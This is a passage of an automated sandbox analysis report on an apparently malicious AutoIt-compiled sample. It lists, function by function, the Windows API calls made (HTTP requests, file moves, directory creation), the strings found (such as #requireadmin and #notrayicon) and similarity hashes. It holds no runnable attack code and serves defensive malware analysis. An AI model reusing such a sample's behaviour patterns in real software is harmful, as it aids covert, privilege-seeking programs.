                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                          • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                          • MoveFileW.KERNEL32(?,?), ref: 00453932
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: File$AttributesFullMoveNamePathlstrcmpi
                          • String ID:
                          • API String ID: 978794511-0
                          • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                          • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                          • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                          • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                          • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                          • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                          • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                          • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                          • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                          • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove$_memcmp
                          • String ID: '$\$h
                          • API String ID: 2205784470-1303700344
                          • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                          • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                          • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                          • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                          • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                          • VariantClear.OLEAUT32 ref: 0045EA6D
                          • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                          • __swprintf.LIBCMT ref: 0045EC33
                          • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                          Strings
                          • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Variant$InitTime$ClearCopySystem__swprintf
                          • String ID: %4d%02d%02d%02d%02d%02d
                          • API String ID: 2441338619-1568723262
                          • Opcode ID: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                          • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                          • Opcode Fuzzy Hash: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                          • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                          APIs
                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                          • Sleep.KERNEL32(0000000A), ref: 0042C67F
                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Interlocked$DecrementIncrement$Sleep
                          • String ID: @COM_EVENTOBJ
                          • API String ID: 327565842-2228938565
                          • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                          • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                          • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                          • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                          APIs
                          • VariantClear.OLEAUT32(?), ref: 0047031B
                          • VariantClear.OLEAUT32(?), ref: 0047044F
                          • VariantInit.OLEAUT32(?), ref: 004704A3
                          • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                          • VariantClear.OLEAUT32(?), ref: 00470516
                            • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                          • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                            • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                          • VariantClear.OLEAUT32(00000000), ref: 0047060D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Variant$Clear$Copy$CallDispFuncInit
                          • String ID: H
                          • API String ID: 3613100350-2852464175
                          • Opcode ID: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                          • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                          • Opcode Fuzzy Hash: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                          • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                          • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                          • String ID:
                          • API String ID: 1291720006-3916222277
                          • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                          • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                          • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                          • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                          APIs
                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                          • IsMenu.USER32(?), ref: 0045FC5F
                          • CreatePopupMenu.USER32 ref: 0045FC97
                          • GetMenuItemCount.USER32(?), ref: 0045FCFD
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                          • String ID: 0$2
                          • API String ID: 93392585-3793063076
                          • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                          • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                          • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                          • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                          APIs
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                          • VariantClear.OLEAUT32(?), ref: 00435320
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                          • VariantClear.OLEAUT32(?), ref: 004353B3
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                          • String ID: crts
                          • API String ID: 586820018-3724388283
                          • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                          • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                          • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                          • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                          APIs
                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                          • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                          • _wcscat.LIBCMT ref: 0044BCAF
                          • _wcslen.LIBCMT ref: 0044BCBB
                          • _wcslen.LIBCMT ref: 0044BCD1
                          • SHFileOperationW.SHELL32(?), ref: 0044BD17
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                          • String ID: \*.*
                          • API String ID: 2326526234-1173974218
                          • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                          • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                          • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                          • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                          APIs
                            • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                          • _wcslen.LIBCMT ref: 004335F2
                          • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                          • GetLastError.KERNEL32 ref: 0043362B
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                          • _wcsrchr.LIBCMT ref: 00433666
                            • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                          • String ID: \
                          • API String ID: 321622961-2967466578
                          • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                          • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                          • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                          • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                          • API String ID: 1038674560-2734436370
                          • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                          • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                          • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                          • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                          • LoadStringW.USER32(00000000), ref: 00434060
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                          • LoadStringW.USER32(00000000), ref: 00434078
                          • _wprintf.LIBCMT ref: 004340A1
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                          Strings
                          • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString$Message_wprintf
                          • String ID: %s (%d) : ==> %s: %s %s
                          • API String ID: 3648134473-3128320259
                          • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                          • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                          • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                          • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                          • __lock.LIBCMT ref: 00417981
                            • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                            • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                            • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                          • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                          • __lock.LIBCMT ref: 004179A2
                          • ___addlocaleref.LIBCMT ref: 004179C0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                          • String ID: KERNEL32.DLL$pI
                          • API String ID: 637971194-197072765
                          • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                          • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                          • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                          • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
